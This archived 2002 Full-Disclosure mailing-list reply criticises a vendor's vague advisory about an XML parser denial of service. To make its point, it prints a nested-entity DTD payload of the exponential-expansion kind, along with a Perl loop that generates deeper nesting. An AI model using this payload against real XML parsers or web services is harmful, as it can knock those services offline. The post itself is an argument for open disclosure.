>>>>> "Amit" == Amit Klein <Amit.Kleinat_private> writes: Amit> Multiple vendors XML parser (and SOAP/WebServices server) Amit> Denial of Service attack using DTD Nice work SanctumInc! Great piece of non-disclosure! It's posts like this one that make Bugtraq a cheap brand name peddling place. Amit> - Other products from other vendors are known to be Amit> vulnerable too Perfect, and since we are not told what the vulnerability is, we are left vulnerable without any way to find out where the problem lies. Fortunately, it doesn't take a rocket scientist to devise a DTD that takes exponential time to process without consuming a lot of memory. Did you have this one in mind? <?xml version="1.0"?> <!-- for ($i=1; $i < $ARGV[0]; $i++) { $j = $i - 1; print <<EOF; <!ENTITY a$i "&a$j;&a$j;"> EOF } --> <!DOCTYPE a [ <!ENTITY a0 ""> <!ENTITY a1 "&a0;&a0;"> <!ENTITY a2 "&a1;&a1;"> <!ENTITY a3 "&a2;&a2;"> <!ENTITY a4 "&a3;&a3;"> <!ENTITY a5 "&a4;&a4;"> <!ENTITY a6 "&a5;&a5;"> <!ENTITY a7 "&a6;&a6;"> <!ENTITY a8 "&a7;&a7;"> <!ENTITY a9 "&a8;&a8;"> <!ENTITY a10 "&a9;&a9;"> <!ENTITY a11 "&a10;&a10;"> <!ENTITY a12 "&a11;&a11;"> <!ENTITY a13 "&a12;&a12;"> <!ENTITY a14 "&a13;&a13;"> <!ENTITY a15 "&a14;&a14;"> <!ENTITY a16 "&a15;&a15;"> <!ENTITY a17 "&a16;&a16;"> <!ENTITY a18 "&a17;&a17;"> <!ENTITY a19 "&a18;&a18;"> <!ENTITY a20 "&a19;&a19;"> <!ENTITY a21 "&a20;&a20;"> <!ENTITY a22 "&a21;&a21;"> <!ENTITY a23 "&a22;&a22;"> <!ENTITY a24 "&a23;&a23;"> <!ENTITY a25 "&a24;&a24;"> ]> <a>&a0;</a> Uh-oh, turns out it's the way DTD is supposed to work, not an implementation defect. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2b30 : Wed Dec 18 2002 - 16:11:48 PST